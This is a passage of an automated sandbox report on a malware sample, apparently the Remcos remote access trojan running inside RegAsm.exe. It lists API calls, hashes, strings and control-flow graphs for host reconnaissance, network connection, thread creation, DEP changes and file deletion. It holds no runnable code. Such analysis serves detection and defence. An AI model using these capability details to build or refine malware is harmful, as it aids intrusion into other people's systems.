                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseExitOpenProcessQuerySleepValue
                                                                                                                                                                      • String ID: 5.1.1 Pro$override$pth_unenc
                                                                                                                                                                      • API String ID: 2281282204-2344886030
                                                                                                                                                                      • Opcode ID: 12348d3a2fbe885265e601d0d8f624f68943fb23a48e4508fc59bb7df0f8f03e
                                                                                                                                                                      • Instruction ID: d275b5d15c9ff05a0ec0da3c9587874d7690dc7fa5d0ec02d6e8a4ede61593ab
                                                                                                                                                                      • Opcode Fuzzy Hash: 12348d3a2fbe885265e601d0d8f624f68943fb23a48e4508fc59bb7df0f8f03e
                                                                                                                                                                      • Instruction Fuzzy Hash: 5921E171B0420127D6087676885B6AE399A9B80708F50453FF409672D7FF7C8E0483AF
                                                                                                                                                                      APIs
                                                                                                                                                                      • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,00433550,00000034,?,?,00BA4F10), ref: 004338DA
                                                                                                                                                                      • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,004335E3,00000000,?,00000000), ref: 004338F0
                                                                                                                                                                      • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,004335E3,00000000,?,00000000,0041E2E2), ref: 00433902
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1815803762-0
                                                                                                                                                                      • Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                                                                                                                                                      • Instruction ID: d68cd6f5f98cbfa2ab0450769c499d20ea76a36e668e3df749659bd42d9a4b78
                                                                                                                                                                      • Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                                                                                                                                                      • Instruction Fuzzy Hash: 40E09A31208310FBEB301F21AC08F573AA5EF89B66F200A3AF256E40E4D6A68801965C
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetSystemTimeAsFileTime.KERNEL32(00000000,0043AB37), ref: 00448A16
                                                                                                                                                                      Strings
                                                                                                                                                                      • GetSystemTimePreciseAsFileTime, xrefs: 004489F2
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Time$FileSystem
                                                                                                                                                                      • String ID: GetSystemTimePreciseAsFileTime
                                                                                                                                                                      • API String ID: 2086374402-595813830
                                                                                                                                                                      • Opcode ID: c8476c07d91a2673d79eb1bf06ec4ca2dbc9f8e1099c36818990a3b57f66e430
                                                                                                                                                                      • Instruction ID: bacba389ed7ed90706db716b221aab5ed2509560655679cc0f09f15d90276a03
                                                                                                                                                                      • Opcode Fuzzy Hash: c8476c07d91a2673d79eb1bf06ec4ca2dbc9f8e1099c36818990a3b57f66e430
                                                                                                                                                                      • Instruction Fuzzy Hash: 79E0E531A81618FBD7116B25EC02E7EBB50DB08B02B10027FFC05A7292EE754D14D6DE
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetComputerNameExW.KERNEL32(00000001,?,0000002B,004750E4), ref: 0041B6BB
                                                                                                                                                                      • GetUserNameW.ADVAPI32(?,0040F25E), ref: 0041B6D3
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Name$ComputerUser
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4229901323-0
                                                                                                                                                                      • Opcode ID: 2a75debd1ac83804218ef8ff91a3dd31c7e5d47f43b5da7d436b4f8c80832694
                                                                                                                                                                      • Instruction ID: 8360233331794fbd8bccde093e114755ab2a7c2896376219b9d5f45c8fb32f7b
                                                                                                                                                                      • Opcode Fuzzy Hash: 2a75debd1ac83804218ef8ff91a3dd31c7e5d47f43b5da7d436b4f8c80832694
                                                                                                                                                                      • Instruction Fuzzy Hash: 90014F7190011CABCB01EBD1DC45EEDB7BCAF44309F10016AB505B21A1EFB46E88CBA8
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32 ref: 00434BDD
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3192549508-0
                                                                                                                                                                      • Opcode ID: 2ffe05228c785604148d814c7fc250910b5f8136668f43492b8067ac5164d55b
                                                                                                                                                                      • Instruction ID: 702e07acd891e046c8aea5fc6397425f5e3bd38ef0af78e1c7fed93ac6412050
                                                                                                                                                                      • Opcode Fuzzy Hash: 2ffe05228c785604148d814c7fc250910b5f8136668f43492b8067ac5164d55b
                                                                                                                                                                      • Instruction Fuzzy Hash:

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 5 40ea00-40ea82 call 41cbe1 GetModuleFileNameW call 40f3fe call 4020f6 * 2 call 41beac call 40fb52 call 401e8d call 43fd50 22 40ea84-40eac9 call 40fbee call 401e65 call 401fab call 410f72 call 40fb9f call 40f3eb 5->22 23 40eace-40eb96 call 401e65 call 401fab call 401e65 call 40531e call 406383 call 401fe2 call 401fd8 * 2 call 401e65 call 401fc0 call 405aa6 call 401e65 call 4051e3 call 401e65 call 4051e3 5->23 49 40ef2d-40ef3e call 401fd8 22->49 69 40eb98-40ebe3 call 406c59 call 401fe2 call 401fd8 call 401fab call 413584 23->69 70 40ebe9-40ec04 call 401e65 call 40b9f8 23->70 69->70 101 40f38a-40f3a5 call 401fab call 4139e4 call 4124b0 69->101 80 40ec06-40ec25 call 401fab call 413584 70->80 81 40ec3e-40ec45 call 40d0a4 70->81 80->81 97 40ec27-40ec3d call 401fab call 4139e4 80->97 89 40ec47-40ec49 81->89 90 40ec4e-40ec55 81->90 93 40ef2c 89->93 94 40ec57 90->94 95 40ec59-40ec65 call 41b354 90->95 93->49 94->95 105 40ec67-40ec69 95->105 106 40ec6e-40ec72 95->106 97->81 126 40f3aa-40f3db call 41bcef call 401f04 call 413a5e call 401f09 * 2 101->126 105->106 108 40ecb1-40ecc4 call 401e65 call 401fab 106->108 109 40ec74 call 407751 106->109 127 40ecc6 call 407790 108->127 128 40eccb-40ed53 call 401e65 call 41bcef call 401f13 call 401f09 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab 108->128 117 40ec79-40ec7b 109->117 120 40ec87-40ec9a call 401e65 call 401fab 117->120 121 40ec7d-40ec82 call 407773 call 40729b 117->121 120->108 142 40ec9c-40eca2 120->142 121->120 157 40f3e0-40f3ea call 40dd7d call 414f65 126->157 127->128 177 40ed55-40ed6e call 401e65 call 401fab call 43bb56 128->177 178 40edbb-40edbf 128->178 142->108 143 40eca4-40ecaa 142->143 143->108 146 40ecac call 40729b 143->146 146->108 177->178 205 40ed70-40edb6 call 401e65 call 401fab call 401e65 call 401fab call 40da6f call 401f13 call 401f09 177->205 180 40ef41-40efa1 call 436f10 call 40247c call 401fab * 2 call 413733 call 409092 178->180 181 40edc5-40edcc 178->181 236 40efa6-40effa call 401e65 call 401fab call 402093 call 401fab call 4137aa call 401e65 call 401fab call 43bb2c 180->236 183 40ee4a-40ee54 call 409092 181->183 184 40edce-40ee48 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 40ce34 181->184 191 40ee59-40ee7d call 40247c call 434829 183->191 184->191 212 40ee8c 191->212 213 40ee7f-40ee8a call 436f10 191->213 205->178 218 40ee8e-40eed9 call 401f04 call 43f859 call 40247c call 401fab call 40247c call 401fab call 413982 212->218 213->218 273 40eede-40ef03 call 434832 call 401e65 call 40b9f8 218->273 287 40f017-40f019 236->287 288 40effc 236->288 273->236 286 40ef09-40ef28 call 401e65 call 41bcef call 40f4af 273->286 286->236 306 40ef2a 286->306 289 40f01b-40f01d 287->289 290 40f01f 287->290 292 40effe-40f015 call 41ce2c CreateThread 288->292 289->292 293 40f025-40f101 call 402093 * 2 call 41b580 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 43bb2c call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab StrToIntA call 409e1f call 401e65 call 401fab 290->293 292->293 344 40f103-40f13a call 43455e call 401e65 call 401fab CreateThread 293->344 345 40f13c 293->345 306->93 346 40f13e-40f156 call 401e65 call 401fab 344->346 345->346 357 40f194-40f1a7 call 401e65 call 401fab 346->357 358 40f158-40f18f call 43455e call 401e65 call 401fab CreateThread 346->358 368 40f207-40f21a call 401e65 call 401fab 357->368 369 40f1a9-40f202 call 401e65 call 401fab call 401e65 call 401fab call 40da23 call 401f13 call 401f09 CreateThread 357->369 358->357 379 40f255-40f279 call 41b69e call 401f13 call 401f09 368->379 380 40f21c-40f250 call 401e65 call 401fab call 401e65 call 401fab call 43bb2c call 40c19d 368->380 369->368 402 40f27b-40f27c SetProcessDEPPolicy 379->402 403 40f27e-40f291 CreateThread 379->403 380->379 402->403 404 40f293-40f29d CreateThread 403->404 405 40f29f-40f2a6 403->405 404->405 408 40f2b4-40f2bb 405->408 409 40f2a8-40f2b2 CreateThread 405->409 412 40f2c9 408->412 413 40f2bd-40f2c0 408->413 409->408 418 40f2ce-40f302 call 402093 call 4052fd call 402093 call 41b580 call 401fd8 412->418 415 40f2c2-40f2c7 413->415 416 40f307-40f31a call 401fab call 41353a 413->416 415->418 425 40f31f-40f322 416->425 418->416 425->157 427 40f328-40f368 call 41bcef call 401f04 call 413656 call 401f09 call 401f04 425->427 443 40f381-40f386 DeleteFileW 427->443 444 40f388 443->444 445 40f36a-40f36d 443->445 444->126 445->126 446 40f36f-40f37c Sleep call 401f04 445->446 446->443
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Psapi), ref: 0041CBF6
                                                                                                                                                                        • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CBFF
                                                                                                                                                                        • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
                                                                                                                                                                        • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC19
                                                                                                                                                                        • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(shcore), ref: 0041CC2B
                                                                                                                                                                        • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC2E
                                                                                                                                                                        • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(user32), ref: 0041CC3F
                                                                                                                                                                        • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC42
                                                                                                                                                                        • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(ntdll), ref: 0041CC54
                                                                                                                                                                        • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC57
                                                                                                                                                                        • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(kernel32), ref: 0041CC63
                                                                                                                                                                        • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC66
                                                                                                                                                                        • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
                                                                                                                                                                        • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC7A
                                                                                                                                                                        • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
                                                                                                                                                                        • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC8E
                                                                                                                                                                        • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shell32), ref: 0041CC9F
                                                                                                                                                                        • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCA2
                                                                                                                                                                        • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
                                                                                                                                                                        • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCB6
                                                                                                                                                                        • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
                                                                                                                                                                        • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCCA
                                                                                                                                                                        • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
                                                                                                                                                                        • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCDE
                                                                                                                                                                        • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
                                                                                                                                                                        • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCF2
                                                                                                                                                                        • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                                                                                                                                                                        • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD06
                                                                                                                                                                        • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shlwapi), ref: 0041CD14
                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 0040EA29
                                                                                                                                                                        • Part of subcall function 00410F72: __EH_prolog.LIBCMT ref: 00410F77
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                                                                                                                                      • String ID: 8SG$8SG$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Exe$Exe$Inj$PSG$Remcos Agent initialized$Rmc-0BYJUE$Software\$User$dMG$del$del$exepath$licence$license_code.txt$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG
                                                                                                                                                                      • API String ID: 2830904901-2676591338
                                                                                                                                                                      • Opcode ID: ea8aa897b517b46e2c0f88cc73235cbabdde2d4f89d4bb93d5e68e572d9e21cb
                                                                                                                                                                      • Instruction ID: f870588dacc207cf398a21a9077505b2b75b96970711a81e27f166ce8512e3fa
                                                                                                                                                                      • Opcode Fuzzy Hash: ea8aa897b517b46e2c0f88cc73235cbabdde2d4f89d4bb93d5e68e572d9e21cb
                                                                                                                                                                      • Instruction Fuzzy Hash: 9B32F960B043412BDA24B7729C57B7E26994F80748F50483FB9467B2E3EEBC8D45839E

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 494 414f65-414fad call 4020df call 41b944 call 4020df call 401e65 call 401fab call 43bb2c 507 414fbc-415008 call 402093 call 401e65 call 4020f6 call 41beac call 40489e call 401e65 call 40b9f8 494->507 508 414faf-414fb6 Sleep 494->508 523 41500a-415079 call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 40473d 507->523 524 41507c-415117 call 402093 call 401e65 call 4020f6 call 41beac call 401e65 * 2 call 406c59 call 402f10 call 401fe2 call 401fd8 * 2 call 401e65 call 405b05 507->524 508->507 523->524 577 415127-41512e 524->577 578 415119-415125 524->578 579 415133-4151c5 call 405aa6 call 40531e call 406383 call 402f10 call 402093 call 41b580 call 401fd8 * 2 call 401e65 call 401fab call 401e65 call 401fab call 414f24 577->579 578->579 606 415210-41521e call 40482d 579->606 607 4151c7-41520b WSAGetLastError call 41cb72 call 4052fd call 402093 call 41b580 call 401fd8 579->607 612 415220-415246 call 402093 * 2 call 41b580 606->612 613 41524b-415260 call 404f51 call 4048c8 606->613 630 415ade-415af0 call 404e26 call 4021fa 607->630 612->630 629 415266-4153b9 call 401e65 * 2 call 40531e call 406383 call 402f10 call 406383 call 402f10 call 402093 call 41b580 call 401fd8 * 4 call 41b871 call 4145f8 call 409097 call 441ed1 call 401e65 call 4020f6 call 40247c call 401fab * 2 call 413733 613->629 613->630 694 4153bb-4153c8 call 405aa6 629->694 695 4153cd-4153f4 call 401fab call 4135e1 629->695 643 415af2-415b12 call 401e65 call 401fab call 43bb2c Sleep 630->643 644 415b18-415b20 call 401e8d 630->644 643->644 644->524 694->695 701 4153f6-4153f8 695->701 702 4153fb-4154c0 call 40417e call 40ddc4 call 41bcd3 call 41bdaf call 41bc1f call 401e65 GetTickCount call 41bc1f call 41bb77 call 41bc1f * 2 call 41bb27 695->702 701->702 725 4154c5-415a51 call 41bdaf * 5 call 40f90c call 41bdaf call 402f31 call 402ea1 call 402f10 call 402ea1 call 402f10 * 3 call 402ea1 call 402f10 call 406383 call 402f10 call 406383 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 406383 call 402f10 * 5 call 402ea1 call 402f10 call 402ea1 call 402f10 * 7 call 402ea1 call 404aa1 call 401fd8 * 50 call 401f09 call 401fd8 * 6 call 401f09 call 404c10 702->725 948 415a53-415a5a 725->948 949 415a65-415a6c 725->949 948->949 950 415a5c-415a5e 948->950 951 415a78-415aaa call 405a6b call 402093 * 2 call 41b580 949->951 952 415a6e-415a73 call 40b08c 949->952 950->949 963 415aac-415ab8 CreateThread 951->963 964 415abe-415ad9 call 401fd8 * 2 call 401f09 951->964 952->951 963->964 964->630
                                                                                                                                                                      APIs
                                                                                                                                                                      • Sleep.KERNEL32(00000000,00000029,004752F0,004750E4,00000000), ref: 00414FB6
                                                                                                                                                                      • WSAGetLastError.WS2_32(00000000,00000001), ref: 004151C7
                                                                                                                                                                      • Sleep.KERNEL32(00000000,00000002), ref: 00415B12
                                                                                                                                                                        • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Sleep$ErrorLastLocalTime
                                                                                                                                                                      • String ID: | $%I64u$5.1.1 Pro$8SG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$Exe$PSG$Rmc-0BYJUE$TLS Off$TLS On $dMG$hlight$name$NG$NG$PG$PG$PG
                                                                                                                                                                      • API String ID: 524882891-2569708818
                                                                                                                                                                      • Opcode ID: def76bbb64f450ab76c69bb498270a0167b4bb67be4ac4a3de4eb40cef6d80d9
                                                                                                                                                                      • Instruction ID: 9dea7478a43989413a8a7de35667e348ffff56bc780dedce428272fd6db975fd
                                                                                                                                                                      • Opcode Fuzzy Hash: def76bbb64f450ab76c69bb498270a0167b4bb67be4ac4a3de4eb40cef6d80d9
                                                                                                                                                                      • Instruction Fuzzy Hash: B8526C31A001155ACB18F732DD96AFEB3769F90348F5044BFE40A761E2EF781E858A9D

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 971 412aef-412b38 GetModuleFileNameW call 4020df * 3 978 412b3a-412bc4 call 41ba09 call 401fab call 40da23 call 401fd8 call 41ba09 call 401fab call 40da23 call 401fd8 call 41ba09 call 401fab call 40da23 call 401fd8 971->978 1003 412bc6-412c56 call 401fab call 40417e call 4042fc call 40431d call 403014 call 401f04 call 4185a3 call 401f09 * 4 978->1003 1026 412c66 1003->1026 1027 412c58-412c60 Sleep 1003->1027 1028 412c68-412cf8 call 401fab call 40417e call 4042fc call 40431d call 403014 call 401f04 call 4185a3 call 401f09 * 4 1026->1028 1027->1003 1027->1026 1051 412d08 1028->1051 1052 412cfa-412d02 Sleep 1028->1052 1053 412d0a-412d9a call 401fab call 40417e call 4042fc call 40431d call 403014 call 401f04 call 4185a3 call 401f09 * 4 1051->1053 1052->1028 1052->1051 1076 412daa-412dcf 1053->1076 1077 412d9c-412da4 Sleep 1053->1077 1078 412dd3-412def call 401f04 call 41c516 1076->1078 1077->1053 1077->1076 1083 412df1-412e00 call 401f04 DeleteFileW 1078->1083 1084 412e06-412e22 call 401f04 call 41c516 1078->1084 1083->1084 1091 412e24-412e3d call 401f04 DeleteFileW 1084->1091 1092 412e3f 1084->1092 1094 412e43-412e5f call 401f04 call 41c516 1091->1094 1092->1094 1100 412e61-412e73 call 401f04 DeleteFileW 1094->1100 1101 412e79-412e7b 1094->1101 1100->1101 1103 412e88-412e93 Sleep 1101->1103 1104 412e7d-412e7f 1101->1104 1103->1078 1105 412e99-412eab call 406b63 1103->1105 1104->1103 1107 412e81-412e86 1104->1107 1110 412f01-412f20 call 401f09 * 3 1105->1110 1111 412ead-412ebb call 406b63 1105->1111 1107->1103 1107->1105 1122 412f25-412f5e call 40b93f call 401f04 call 4020f6 call 413268 1110->1122 1111->1110 1117 412ebd-412ecb call 406b63 1111->1117 1117->1110 1123 412ecd-412ef9 Sleep call 401f09 * 3 1117->1123 1138 412f63-412f89 call 401f09 call 405b05 1122->1138 1123->978 1136 412eff 1123->1136 1136->1122 1143 4130e3-4131dc call 41bdaf call 402f31 call 402f10 * 6 call 402ea1 call 404aa1 call 401fd8 * 7 1138->1143 1144 412f8f-4130de call 41bdaf call 41bc1f call 402f31 call 402f10 * 6 call 402ea1 call 402f10 call 402ea1 call 404aa1 call 401fd8 * 10 1138->1144 1213 4131e0-413267 call 401fd8 call 401f09 call 401fd8 * 9 1143->1213 1144->1213
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412B08
                                                                                                                                                                        • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,639B1986,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                                                                                                                                                                        • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5), ref: 004185B9
                                                                                                                                                                        • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84), ref: 004185C2
                                                                                                                                                                      • Sleep.KERNEL32(0000000A,00465E84), ref: 00412C5A
                                                                                                                                                                      • Sleep.KERNEL32(0000000A,00465E84,00465E84), ref: 00412CFC
                                                                                                                                                                      • Sleep.KERNEL32(0000000A,00465E84,00465E84,00465E84), ref: 00412D9E
                                                                                                                                                                      • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E00
                                                                                                                                                                      • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E37
                                                                                                                                                                      • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E73
                                                                                                                                                                      • Sleep.KERNEL32(000001F4,00465E84,00465E84,00465E84), ref: 00412E8D
                                                                                                                                                                      • Sleep.KERNEL32(00000064), ref: 00412ECF
                                                                                                                                                                        • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                                                                                                                                      • String ID: /stext "$0TG$0TG$NG$NG
                                                                                                                                                                      • API String ID: 1223786279-2576077980
                                                                                                                                                                      • Opcode ID: 4bdd05a84858bef7d2deeb6c8512751205b53f7b4fd3f56cef84c47e6db4f04e
                                                                                                                                                                      • Instruction ID: 10d3359c81a21c2239512d2238f4034584c87ebec4848cfd83014516dee20f06
                                                                                                                                                                      • Opcode Fuzzy Hash: 4bdd05a84858bef7d2deeb6c8512751205b53f7b4fd3f56cef84c47e6db4f04e
                                                                                                                                                                      • Instruction Fuzzy Hash: 2F0268315083414AC325FB62D891AEFB3E5AFD4348F50483FF58A931E2EF785A49C65A

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 10001434
                                                                                                                                                                        • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                                                                                                                                                        • Part of subcall function 100010F1: lstrcatW.KERNEL32(?,?), ref: 10001151
